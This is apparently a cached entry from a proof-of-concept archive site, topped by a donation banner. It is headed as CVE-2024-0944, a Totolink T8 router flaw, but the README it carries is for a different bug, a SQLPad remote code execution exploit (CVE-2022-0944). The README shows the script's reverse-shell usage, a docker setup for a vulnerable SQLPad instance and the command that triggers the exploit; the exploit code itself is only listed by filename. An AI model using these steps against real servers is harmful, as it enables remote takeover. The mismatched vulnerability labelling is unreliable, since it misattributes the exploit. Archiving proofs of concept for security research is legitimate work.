Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-0944 PoC — Totolink T8 代码问题漏洞

Source
Associated Vulnerability
Title:Totolink T8 代码问题漏洞 (CVE-2024-0944)
Description:TOTOLINK T8是中国吉翁电子(TOTOLINK)公司的一款路由器。 Totolink T8 4.1.5cu.833_20220905版本存在代码问题漏洞。攻击者利用该漏洞导致会话过期。
Readme
# CVE-2022-0944

A proof of concept exploit for [SQLPad RCE (CVE-2022-0944)](https://huntr.com/bounties/46630727-d923-4444-a421-537ecd63e7fb)

## Usage

```
usage: main.py [-h] url lhost lport [username] [password]

positional arguments:
  url         URL to SQLPad
  lhost       Listener host address for reverse shell
  lport       Listener port for reverse shell
  username    login username (optional)
  password    login password (optional)

options:
  -h, --help  show this help message and exit
```

**Example:**

```bash
# install requirements
pip install -r requirements.txt

# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0

# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin
```

# Disclaimer

This repository contains code and tools that are intended solely for educational purposes, specifically for use in cybersecurity courses and learning environments. The author of this code assumes no responsibility for any consequences arising from the use, misuse, or modification of this code. The code is provided "as is" without any warranty, either express or implied, including but not limited to the implied warranties of merchantability or fitness for a particular purpose.
File Snapshot

[4.0K] /data/pocs/9fca8415c1f5ac3ba03608090c7e32308c1ebea1 ├── [2.8K] exploit.py ├── [1.3K] README.md ├── [ 552] requirements.txt └── [ 619] SECURITY.md 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.